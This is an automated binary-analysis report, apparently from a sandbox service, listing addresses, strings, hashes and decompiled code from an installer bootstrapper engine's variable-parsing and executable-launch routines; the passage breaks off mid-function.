                                                                                                                                                                  0x00419f8d
                                                                                                                                                                  0x00419f95
                                                                                                                                                                  0x00419f9a
                                                                                                                                                                  0x00419f9c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00419ec7
                                                                                                                                                                  0x00419ec7
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00419ec7
                                                                                                                                                                  0x00419ea4
                                                                                                                                                                  0x00419ea4
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00419ea4
                                                                                                                                                                  0x00419e89
                                                                                                                                                                  0x00419e89
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00419e89
                                                                                                                                                                  0x00419e68
                                                                                                                                                                  0x00419e68
                                                                                                                                                                  0x00419ecd
                                                                                                                                                                  0x00419ede
                                                                                                                                                                  0x00419ee2
                                                                                                                                                                  0x00419f7e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00419ee8
                                                                                                                                                                  0x00419ee8
                                                                                                                                                                  0x00419eed
                                                                                                                                                                  0x00419ef1
                                                                                                                                                                  0x00419f08
                                                                                                                                                                  0x00419f0c
                                                                                                                                                                  0x00419f6b
                                                                                                                                                                  0x00419f6e
                                                                                                                                                                  0x00419f73
                                                                                                                                                                  0x00419f74
                                                                                                                                                                  0x00419f74
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00419ef3
                                                                                                                                                                  0x00419ef3
                                                                                                                                                                  0x00419f0e
                                                                                                                                                                  0x00419f0e
                                                                                                                                                                  0x00419f13
                                                                                                                                                                  0x00419f18
                                                                                                                                                                  0x00419f1b
                                                                                                                                                                  0x00419f1b
                                                                                                                                                                  0x00419f25
                                                                                                                                                                  0x00419f26
                                                                                                                                                                  0x00419f29
                                                                                                                                                                  0x00419f2c
                                                                                                                                                                  0x00419f32
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00419f32
                                                                                                                                                                  0x00419ef1
                                                                                                                                                                  0x00419ee2
                                                                                                                                                                  0x00419e66
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00419e45
                                                                                                                                                                  0x00419fa6
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00419fa6
                                                                                                                                                                  0x00419dda
                                                                                                                                                                  0x00419dda
                                                                                                                                                                  0x00419de7
                                                                                                                                                                  0x00419dec
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00419dec
                                                                                                                                                                  0x00419dd8
                                                                                                                                                                  0x00419db0
                                                                                                                                                                  0x00419db0
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00419db0
                                                                                                                                                                  0x00419d36
                                                                                                                                                                  0x00419d36
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00419d36
                                                                                                                                                                  0x00419d34
                                                                                                                                                                  0x00419d15
                                                                                                                                                                  0x00419cd9
                                                                                                                                                                  0x00419cd9
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00419cd9
                                                                                                                                                                  0x00419caf
                                                                                                                                                                  0x00419caf
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00419caf
                                                                                                                                                                  0x00419c8d
                                                                                                                                                                  0x00419c8d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00419c8d
                                                                                                                                                                  0x00419c6b
                                                                                                                                                                  0x00419c6b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00419c6b
                                                                                                                                                                  0x00419c49
                                                                                                                                                                  0x00419c49
                                                                                                                                                                  0x00419f83
                                                                                                                                                                  0x00419f83
                                                                                                                                                                  0x00419f84
                                                                                                                                                                  0x00419f8a
                                                                                                                                                                  0x00419f3a
                                                                                                                                                                  0x00419f3a
                                                                                                                                                                  0x00419f3f
                                                                                                                                                                  0x00419f44
                                                                                                                                                                  0x00419f44
                                                                                                                                                                  0x00419f47
                                                                                                                                                                  0x00419f4c
                                                                                                                                                                  0x00419f51
                                                                                                                                                                  0x00419f51
                                                                                                                                                                  0x00419f58
                                                                                                                                                                  0x00419f5d
                                                                                                                                                                  0x00419f5d
                                                                                                                                                                  0x00419f68

                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: StringVariant$AllocClearFreeInit
                                                                                                                                                                  • String ID: Code$DetectCondition$ExitCode$Failed to allocate memory for exit code structs.$Failed to get @Code.$Failed to get @DetectCondition.$Failed to get @InstallArguments.$Failed to get @Protocol.$Failed to get @RepairArguments.$Failed to get @Repairable.$Failed to get @Type.$Failed to get @UninstallArguments.$Failed to get exit code node count.$Failed to get next node.$Failed to parse @Code value: %ls$Failed to select exit code nodes.$InstallArguments$Invalid exit code type: %ls$Protocol$RepairArguments$Repairable$Type$UninstallArguments$burn$error$exeengine.cpp$forceReboot$netfx4$none$scheduleReboot$success
                                                                                                                                                                  • API String ID: 760788290-3753375000
                                                                                                                                                                  • Opcode ID: 0e76f42cf1631ccb3669afdb154160f96685f0175130075bc127c46c671747fc
                                                                                                                                                                  • Instruction ID: 636ebf3a7e94396e5188b83d6d97f587019edf25734fbfe327947828235322fa
                                                                                                                                                                  • Opcode Fuzzy Hash: 0e76f42cf1631ccb3669afdb154160f96685f0175130075bc127c46c671747fc
                                                                                                                                                                  • Instruction Fuzzy Hash: 69A1F831A44725BBDB149B64CC51FEEB6A4AB04720F20425BF525FB2D0DBBCAD81878D
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00404769, Relevance: 58.1, APIs: 5, Strings: 28, Instructions: 313COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 67%
                                                                                                                                                                  			E00404769(struct _CRITICAL_SECTION* _a4, intOrPtr _a8) {
				char _v8;
				signed int _v12;
				short* _v16;
				char _v20;
				void* _v24;
				signed int _v28;
				char _v32;
				char _v36;
				char _v52;
				void* __edi;
				intOrPtr* _t88;
				int _t132;
				struct _CRITICAL_SECTION* _t138;
				intOrPtr* _t141;
				signed int _t142;
				int _t151;
				signed int _t152;
				void* _t153;
				signed int _t154;
				struct _CRITICAL_SECTION* _t156;
				void* _t158;
				int _t159;
				void* _t161;

				_t138 = _a4;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v8 = 0;
				_v16 = 0;
				asm("stosd");
				_v20 = 0;
				_v36 = 0;
				_v28 = 0;
				EnterCriticalSection(_t138);
				if(E00435FBE(_a8, L"Variable",  &_v24) >= 0) {
					_t88 = _v24;
					_t140 =  *_t88;
					_t158 =  *((intOrPtr*)( *_t88 + 0x20))(_t88,  &_v32);
					if(_t158 >= 0) {
						_t151 = 0;
						_a4 = 0;
						if(_v32 > 0) {
							while(1) {
								_t158 = E00435F1D(_t140, _v24,  &_v12, _t151);
								if(_t158 < 0) {
									break;
								}
								_t158 = E00435B5E(_v12, L"Id",  &_v8);
								if(_t158 < 0) {
									_push("Failed to get @Id.");
									goto L53;
								} else {
									_t158 = E00435D6C(_t140, _v12, L"Hidden",  &_v20);
									if(_t158 < 0) {
										_push("Failed to get @Hidden.");
										goto L53;
									} else {
										_t158 = E00435D6C(_t140, _v12, L"Persisted",  &_v36);
										if(_t158 < 0) {
											_push("Failed to get @Persisted.");
											goto L53;
										} else {
											_t158 = E00435B5E(_v12, L"Value",  &_v16);
											if(_t158 == 0x80070490) {
												_t159 = _t151;
												goto L25;
											} else {
												if(_t158 < 0) {
													_push("Failed to get @Value.");
													goto L53;
												} else {
													_t158 = E00418DBD(_t151,  &_v52, _v16, _t151);
													if(_t158 < 0) {
														_push("Failed to set variant value.");
														goto L53;
													} else {
														_t158 = E00435B5E(_v12, L"Type",  &_v16);
														if(_t158 < 0) {
															_push("Failed to get @Type.");
															goto L53;
														} else {
															_t132 = CompareStringW(0x7f, _t151, _v16, 0xffffffff, L"numeric", 0xffffffff);
															_t159 = 2;
															if(_t132 != _t159) {
																if(CompareStringW(0x7f, _t151, _v16, 0xffffffff, L"string", 0xffffffff) != _t159) {
																	if(CompareStringW(0x7f, _t151, _v16, 0xffffffff, L"version", 0xffffffff) != _t159) {
																		_push(_v16);
																		_t153 = 0x80070057;
																		_t158 = 0x80070057;
																		_push("Invalid value for @Type: %ls");
																		goto L45;
																	} else {
																		if(_v20 == 0) {
																			_push(_v52);
																			E00430F28(_t159, "Initializing version variable \'%ls\' to value \'%ls\'", _v8);
																			_t161 = _t161 + 0x10;
																		}
																		_t159 = 3;
																		goto L25;
																	}
																} else {
																	if(_v20 != 0) {
																		goto L26;
																	} else {
																		_push(_v52);
																		E00430F28(_t159, "Initializing string variable \'%ls\' to value \'%ls\'", _v8);
																		_t161 = _t161 + 0x10;
																		goto L25;
																	}
																	goto L27;
																}
															} else {
																if(_v20 == 0) {
																	_push(_v52);
																	E00430F28(_t159, "Initializing numeric variable \'%ls\' to value \'%ls\'", _v8);
																	_t161 = _t161 + 0x10;
																}
																_t159 = 1;
																L25:
																if(_v20 != 0) {
																	L26:
																	E00430F28(2, "Initializing hidden variable \'%ls\'", _v8);
																	_t161 = _t161 + 0xc;
																}
																L27:
																_t158 = E00418B53( &_v52, _t159);
																if(_t158 < 0) {
																	_push("Failed to change variant type.");
																	goto L53;
																} else {
																	_t158 = E004020A3(_t140, _t138, _v8,  &_v28);
																	if(_t158 < 0) {
																		_push(_v8);
																		_push("Failed to find variable value \'%ls\'.");
																		goto L32;
																	} else {
																		_t152 = _v28;
																		if(_t158 != 1) {
																			_t115 =  *((intOrPtr*)(_t138 + 0x20));
																			if( *((intOrPtr*)(_t152 * 0x30 +  *((intOrPtr*)(_t138 + 0x20)) + 0x20)) != 0) {
																				_t153 = 0x80070057;
																				_t158 = 0x80070057;
																				E004300D9(_t115, "variable.cpp", 0x18f, 0x80070057);
																				_push(_v8);
																				_push("Attempt to set built-in variable value: %ls");
																				L45:
																				_push(_t153);
																				goto L46;
																			} else {
																				goto L34;
																			}
																		} else {
																			_t158 = E0040348A(_t140, _t138, _v8, _t152);
																			if(_t158 >= 0) {
																				L34:
																				_t154 = _t152 * 0x30;
																				 *((intOrPtr*)(_t154 +  *((intOrPtr*)(_t138 + 0x20)) + 0x18)) = _v20;
																				 *((intOrPtr*)(_t154 +  *((intOrPtr*)(_t138 + 0x20)) + 0x1c)) = _v36;
																				_t158 = E00418BE2( &_v52,  *((intOrPtr*)(_t138 + 0x20)) + 8 + _t154);
																				if(_t158 < 0) {
																					_push(_v8);
																					_push("Failed to set value of variable: %ls");
																					goto L32;
																				} else {
																					_t140 = _v12;
																					if(_t140 != 0) {
																						 *((intOrPtr*)( *_t140 + 8))(_t140);
																						_v12 = _v12 & 0x00000000;
																					}
																					_t156 = _a4 + 1;
																					_a4 = _t156;
																					if(_t156 < _v32) {
																						_t151 = 0;
																						continue;
																					}
																				}
																			} else {
																				_push(_v8);
																				_push("Failed to insert variable \'%ls\'.");
																				L32:
																				_push(_t158);
																				L46:
																				E00430A57();
																			}
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								}
								goto L54;
							}
							_push("Failed to get next node.");
							goto L53;
						}
					} else {
						_push("Failed to get variable node count.");
						goto L53;
					}
				} else {
					_push("Failed to select variable nodes.");
					L53:
					_push(_t158);
					E00430A57();
				}
				L54:
				LeaveCriticalSection(_t138);
				_t141 = _v24;
				if(_t141 != 0) {
					 *((intOrPtr*)( *_t141 + 8))(_t141);
				}
				_t142 = _v12;
				if(_t142 != 0) {
					 *((intOrPtr*)( *_t142 + 8))(_t142);
				}
				if(_v16 != 0) {
					E004380AB(_v16);
				}
				if(_v8 != 0) {
					E004380AB(_v8);
				}
				E00418E52( &_v52);
				return _t158;
			}


























                                                                                                                                                                  0x00404770
                                                                                                                                                                  0x0040477a
                                                                                                                                                                  0x0040477d
                                                                                                                                                                  0x0040477e
                                                                                                                                                                  0x00404780
                                                                                                                                                                  0x00404783
                                                                                                                                                                  0x00404786
                                                                                                                                                                  0x00404789
                                                                                                                                                                  0x0040478c
                                                                                                                                                                  0x0040478f
                                                                                                                                                                  0x00404790
                                                                                                                                                                  0x00404793
                                                                                                                                                                  0x00404796
                                                                                                                                                                  0x00404799
                                                                                                                                                                  0x004047b4
                                                                                                                                                                  0x004047c0
                                                                                                                                                                  0x004047c6
                                                                                                                                                                  0x004047cd
                                                                                                                                                                  0x004047d1
                                                                                                                                                                  0x004047dd
                                                                                                                                                                  0x004047df
                                                                                                                                                                  0x004047e5
                                                                                                                                                                  0x004047eb
                                                                                                                                                                  0x004047f8
                                                                                                                                                                  0x004047fc
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00404813
                                                                                                                                                                  0x00404817
                                                                                                                                                                  0x00404aac
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040481d
                                                                                                                                                                  0x0040482e
                                                                                                                                                                  0x00404832
                                                                                                                                                                  0x00404aa5
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00404838
                                                                                                                                                                  0x00404849
                                                                                                                                                                  0x0040484d
                                                                                                                                                                  0x00404a9e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00404853
                                                                                                                                                                  0x00404864
                                                                                                                                                                  0x0040486c
                                                                                                                                                                  0x00404958
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00404872
                                                                                                                                                                  0x00404874
                                                                                                                                                                  0x00404a4c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040487a
                                                                                                                                                                  0x00404887
                                                                                                                                                                  0x0040488b
                                                                                                                                                                  0x00404a45
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00404891
                                                                                                                                                                  0x004048a2
                                                                                                                                                                  0x004048a6
                                                                                                                                                                  0x00404a3e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004048ac
                                                                                                                                                                  0x004048bb
                                                                                                                                                                  0x004048c3
                                                                                                                                                                  0x004048c6
                                                                                                                                                                  0x004048fe
                                                                                                                                                                  0x00404933
                                                                                                                                                                  0x00404a2d
                                                                                                                                                                  0x00404a30
                                                                                                                                                                  0x00404a35
                                                                                                                                                                  0x00404a37
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00404939
                                                                                                                                                                  0x0040493d
                                                                                                                                                                  0x0040493f
                                                                                                                                                                  0x0040494b
                                                                                                                                                                  0x00404950
                                                                                                                                                                  0x00404950
                                                                                                                                                                  0x00404955
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00404955
                                                                                                                                                                  0x00404900
                                                                                                                                                                  0x00404904
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00404906
                                                                                                                                                                  0x00404906
                                                                                                                                                                  0x00404912
                                                                                                                                                                  0x00404917
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00404917
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00404904
                                                                                                                                                                  0x004048c8
                                                                                                                                                                  0x004048cc
                                                                                                                                                                  0x004048ce
                                                                                                                                                                  0x004048da
                                                                                                                                                                  0x004048df
                                                                                                                                                                  0x004048df
                                                                                                                                                                  0x004048e4
                                                                                                                                                                  0x0040495a
                                                                                                                                                                  0x0040495e
                                                                                                                                                                  0x00404960
                                                                                                                                                                  0x0040496a
                                                                                                                                                                  0x0040496f
                                                                                                                                                                  0x0040496f
                                                                                                                                                                  0x00404972
                                                                                                                                                                  0x0040497c
                                                                                                                                                                  0x00404980
                                                                                                                                                                  0x00404a97
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00404986
                                                                                                                                                                  0x00404993
                                                                                                                                                                  0x00404997
                                                                                                                                                                  0x00404a8a
                                                                                                                                                                  0x00404a8d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040499d
                                                                                                                                                                  0x0040499d
                                                                                                                                                                  0x004049a3
                                                                                                                                                                  0x004049c3
                                                                                                                                                                  0x004049d0
                                                                                                                                                                  0x00404a60
                                                                                                                                                                  0x00404a70
                                                                                                                                                                  0x00404a72
                                                                                                                                                                  0x00404a77
                                                                                                                                                                  0x00404a7a
                                                                                                                                                                  0x00404a7f
                                                                                                                                                                  0x00404a7f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004049a5
                                                                                                                                                                  0x004049af
                                                                                                                                                                  0x004049b3
                                                                                                                                                                  0x004049d6
                                                                                                                                                                  0x004049d9
                                                                                                                                                                  0x004049df
                                                                                                                                                                  0x004049e9
                                                                                                                                                                  0x004049ff
                                                                                                                                                                  0x00404a03
                                                                                                                                                                  0x00404a53
                                                                                                                                                                  0x00404a56
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00404a05
                                                                                                                                                                  0x00404a05
                                                                                                                                                                  0x00404a0a
                                                                                                                                                                  0x00404a0f
                                                                                                                                                                  0x00404a12
                                                                                                                                                                  0x00404a12
                                                                                                                                                                  0x00404a19
                                                                                                                                                                  0x00404a1a
                                                                                                                                                                  0x00404a20
                                                                                                                                                                  0x00404a26
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00404a26
                                                                                                                                                                  0x00404a20
                                                                                                                                                                  0x004049b5
                                                                                                                                                                  0x004049b5
                                                                                                                                                                  0x004049b8
                                                                                                                                                                  0x004049bd
                                                                                                                                                                  0x004049bd
                                                                                                                                                                  0x00404a80
                                                                                                                                                                  0x00404a80
                                                                                                                                                                  0x00404a85
                                                                                                                                                                  0x004049b3
                                                                                                                                                                  0x004049a3
                                                                                                                                                                  0x00404997
                                                                                                                                                                  0x00404980
                                                                                                                                                                  0x004048c6
                                                                                                                                                                  0x004048a6
                                                                                                                                                                  0x0040488b
                                                                                                                                                                  0x00404874
                                                                                                                                                                  0x0040486c
                                                                                                                                                                  0x0040484d
                                                                                                                                                                  0x00404832
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00404817
                                                                                                                                                                  0x00404ab3
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00404ab3
                                                                                                                                                                  0x004047d3
                                                                                                                                                                  0x004047d3
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004047d3
                                                                                                                                                                  0x004047b6
                                                                                                                                                                  0x004047b6
                                                                                                                                                                  0x00404ab8
                                                                                                                                                                  0x00404ab8
                                                                                                                                                                  0x00404ab9
                                                                                                                                                                  0x00404abf
                                                                                                                                                                  0x00404ac0
                                                                                                                                                                  0x00404ac1
                                                                                                                                                                  0x00404ac7
                                                                                                                                                                  0x00404acc
                                                                                                                                                                  0x00404ad1
                                                                                                                                                                  0x00404ad1
                                                                                                                                                                  0x00404ad4
                                                                                                                                                                  0x00404ad9
                                                                                                                                                                  0x00404ade
                                                                                                                                                                  0x00404ade
                                                                                                                                                                  0x00404ae5
                                                                                                                                                                  0x00404aea
                                                                                                                                                                  0x00404aea
                                                                                                                                                                  0x00404af3
                                                                                                                                                                  0x00404af8
                                                                                                                                                                  0x00404af8
                                                                                                                                                                  0x00404b01
                                                                                                                                                                  0x00404b0c

                                                                                                                                                                  APIs
                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?,00401E67,00000000,80070490,?,?,?,0042287C,00401EEF,?,00401F13,?,?,Chain,?,00401DDF), ref: 00404799
                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,?,0042287C,00401EEF,?,00401F13,?,?,Chain,?,00401DDF,00401E67,?,Log), ref: 00404AC1
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to set variant value., xrefs: 00404A45
                                                                                                                                                                  • Failed to get @Persisted., xrefs: 00404A9E
                                                                                                                                                                  • Initializing string variable '%ls' to value '%ls', xrefs: 0040490C
                                                                                                                                                                  • Failed to select variable nodes., xrefs: 004047B6
                                                                                                                                                                  • Value, xrefs: 00404857
                                                                                                                                                                  • Failed to get @Value., xrefs: 00404A4C
                                                                                                                                                                  • Failed to set value of variable: %ls, xrefs: 00404A56
                                                                                                                                                                  • version, xrefs: 0040491E
                                                                                                                                                                  • Variable, xrefs: 004047A3
                                                                                                                                                                  • Failed to find variable value '%ls'., xrefs: 00404A8D
                                                                                                                                                                  • Type, xrefs: 00404895
                                                                                                                                                                  • Failed to insert variable '%ls'., xrefs: 004049B8
                                                                                                                                                                  • Failed to get variable node count., xrefs: 004047D3
                                                                                                                                                                  • Failed to change variant type., xrefs: 00404A97
                                                                                                                                                                  • variable.cpp, xrefs: 00404A6B
                                                                                                                                                                  • Failed to get @Id., xrefs: 00404AAC
                                                                                                                                                                  • Failed to get next node., xrefs: 00404AB3
                                                                                                                                                                  • string, xrefs: 004048E9
                                                                                                                                                                  • numeric, xrefs: 004048AE
                                                                                                                                                                  • Failed to get @Hidden., xrefs: 00404AA5
                                                                                                                                                                  • Persisted, xrefs: 0040483C
                                                                                                                                                                  • Failed to get @Type., xrefs: 00404A3E
                                                                                                                                                                  • Hidden, xrefs: 00404821
                                                                                                                                                                  • Initializing numeric variable '%ls' to value '%ls', xrefs: 004048D4
                                                                                                                                                                  • Initializing hidden variable '%ls', xrefs: 00404963
                                                                                                                                                                  • Attempt to set built-in variable value: %ls, xrefs: 00404A7A
                                                                                                                                                                  • Invalid value for @Type: %ls, xrefs: 00404A37
                                                                                                                                                                  • Initializing version variable '%ls' to value '%ls', xrefs: 00404945
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                  • String ID: Attempt to set built-in variable value: %ls$Failed to change variant type.$Failed to find variable value '%ls'.$Failed to get @Hidden.$Failed to get @Id.$Failed to get @Persisted.$Failed to get @Type.$Failed to get @Value.$Failed to get next node.$Failed to get variable node count.$Failed to insert variable '%ls'.$Failed to select variable nodes.$Failed to set value of variable: %ls$Failed to set variant value.$Hidden$Initializing hidden variable '%ls'$Initializing numeric variable '%ls' to value '%ls'$Initializing string variable '%ls' to value '%ls'$Initializing version variable '%ls' to value '%ls'$Invalid value for @Type: %ls$Persisted$Type$Value$Variable$numeric$string$variable.cpp$version
                                                                                                                                                                  • API String ID: 3168844106-1657652604
                                                                                                                                                                  • Opcode ID: 53e3507a789b2dbaade2e653e71e7a6bcb659973504edf82f03922f73fdcbf78
                                                                                                                                                                  • Instruction ID: 9cc81eaaa1381f241ff622be6af707f159127d995c5ad3ddb90b170c71993063
                                                                                                                                                                  • Opcode Fuzzy Hash: 53e3507a789b2dbaade2e653e71e7a6bcb659973504edf82f03922f73fdcbf78
                                                                                                                                                                  • Instruction Fuzzy Hash: 3FA1B8B1E40225BBCF119B94CC41EAEB774AB88710F21527BFA15B62D1C77C9A019F9C
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004195AC, Relevance: 54.7, APIs: 9, Strings: 22, Instructions: 406COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 59%
                                                                                                                                                                  			E004195AC(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v8;
				short _v528;
				struct _SECURITY_ATTRIBUTES* _v532;
				struct _SECURITY_ATTRIBUTES* _v536;
				char _v540;
				char _v544;
				struct _SECURITY_ATTRIBUTES* _v548;
				char _v552;
				char _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				signed short _v568;
				intOrPtr _v572;
				struct _PROCESS_INFORMATION _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				intOrPtr _v604;
				intOrPtr _v608;
				char _v612;
				struct _STARTUPINFOW _v680;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t134;
				signed short _t155;
				signed short _t171;
				signed short _t177;
				signed short _t181;
				signed short _t183;
				signed short _t194;
				intOrPtr _t205;
				signed short _t218;
				signed short _t225;
				signed short _t232;
				signed short _t239;
				void* _t242;
				void* _t243;
				intOrPtr _t247;
				void* _t248;
				signed int _t249;
				void* _t250;
				void* _t251;
				void* _t252;
				void* _t253;
				void* _t256;
				void* _t257;

				_t242 = __edx;
				_t134 =  *0x4560d0; // 0xae480e18
				_v8 = _t134 ^ _t249;
				_v572 = _a8;
				_v596 = _a12;
				_t247 = _a4;
				_v560 = _a16;
				_v564 = _a20;
				_push(0x208);
				_v592 = _a24;
				_push(0);
				_push( &_v528);
				E004267C0(0, __ecx, _t243, _t247, __eflags);
				_push(0x44);
				_push(0);
				_push( &_v680);
				_v568 = 0;
				_v556 = 0;
				_v552 = 0;
				_v548 = 0;
				_v532 = 0;
				_v536 = 0;
				_v540 = 0;
				E004267C0(0, __ecx, _t243, _t247, __eflags);
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t251 = _t250 + 0x18;
				asm("stosd");
				_v544 = 0;
				if(E00413BE9( &_v548,  &_v612,  *((intOrPtr*)( *((intOrPtr*)(_t247 + 8)) + 0x14)),  *((intOrPtr*)( *((intOrPtr*)(_t247 + 8)) + 0x24)),  &_v548) >= 0) {
					_t225 = E004314A9(_v548,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t247 + 8)) + 0x7c)))) + 0x18)),  &_v532);
					__eflags = _t225;
					if(_t225 >= 0) {
						_t155 =  *((intOrPtr*)(_t247 + 0x10)) - 1;
						__eflags = _t155;
						if(_t155 == 0) {
							_t246 =  *( *((intOrPtr*)(_t247 + 8)) + 0x9c);
							L13:
							__eflags = _t246;
							if(_t246 == 0) {
								L22:
								_t246 = L"\"%ls\"";
								_t225 = E00433CEA( &_v536, L"\"%ls\"", _v532);
								_t252 = _t251 + 0xc;
								__eflags = _t225;
								if(_t225 < 0) {
									L18:
									_push("Failed to create executable command.");
									L5:
									_push(_t225);
									E00430A57();
									L57:
									if(_v556 != 0) {
										E004380AB(_v556);
									}
									if(_v552 != 0) {
										E004380AB(_v552);
									}
									if(_v548 != 0) {
										E004380AB(_v548);
									}
									if(_v532 != 0) {
										E004380AB(_v532);
									}
									if(_v536 != 0) {
										E004380AB(_v536);
									}
									if(_v540 != 0) {
										E004380AB(_v540);
									}
									_t248 = CloseHandle;
									if(_v588.hThread != 0) {
										CloseHandle(_v588.hThread);
										_v588.hThread = _v588.hThread & 0x00000000;
									}
									if(_v588.hProcess != 0) {
										CloseHandle(_v588.hProcess);
									}
									return L004267AF(_t225, _v8 ^ _t249, _t246, _t248);
								}
								_t171 = E00433CEA( &_v540, L"\"%ls\"", _v532);
								_t253 = _t252 + 0xc;
								L24:
								_t225 = _t171;
								__eflags = _t225;
								if(_t225 >= 0) {
									__eflags =  *(_t247 + 0x14);
									if( *(_t247 + 0x14) == 0) {
										L32:
										_push(_v540);
										_push(_v532);
										_push(E0040E2BB( *((intOrPtr*)(_t247 + 0x10))));
										_push( *((intOrPtr*)( *((intOrPtr*)(_t247 + 8)))));
										E00402003(2, 0x2000012d, E0040E8FD(_v596));
										_t239 =  *(_t247 + 0xc);
										_t246 = SetCurrentDirectoryW;
										_t251 = _t253 + 0x1c;
										__eflags = _t239;
										if(_t239 != 0) {
											L40:
											_t177 = GetCurrentDirectoryW(0x104,  &_v528);
											__eflags = _t177;
											if(_t177 != 0) {
												_v568 = SetCurrentDirectoryW(_v548);
											}
											_v680.cb = 0x44;
											_t181 = CreateProcessW(_v532, _v536, 0, 0, 0, 0x8000000, 0, 0,  &_v680,  &_v588);
											__eflags = _t181;
											if(_t181 != 0) {
												__eflags =  *(_t247 + 0xc);
												if( *(_t247 + 0xc) == 0) {
													do {
														_v612 = 2;
														_v608 = 1;
														_v604 = 0x32;
														_t183 = _v560( &_v612, _v564);
														__eflags = _t183 - 1;
														if(_t183 == 1) {
															goto L48;
														}
														__eflags = _t183;
														if(_t183 != 0) {
															__eflags = _t183 - 2;
															_t225 = (0 | _t183 != 0x00000002) + 0x80070642;
															E004300D9(_t183, "exeengine.cpp", 0x210, _t225);
															_push("Bootstrapper application aborted during EXE progress.");
															_push(_t225);
															E00430A57();
															goto L55;
														}
														L48:
